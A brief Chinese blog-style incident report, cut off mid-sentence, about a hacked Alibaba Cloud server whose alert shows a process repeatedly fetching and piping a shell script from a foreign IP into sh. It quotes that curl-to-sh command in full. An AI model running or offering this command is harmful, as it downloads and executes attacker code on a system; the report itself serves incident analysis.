記一次阿里雲黑客攻擊事件

這幾天服務器一直髮生異常行爲,阿里雲報警如下: 根據執行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,後臺某個進程一直從這個美國的IP地址下載sh可執行文件 訪問這個地址:http://165.225.157.157:8000/i.sh 看到執行語句如下: 大概明白,意思是定時從這個地址獲取sh可執行文件,然後
相關文章
相關標籤/搜索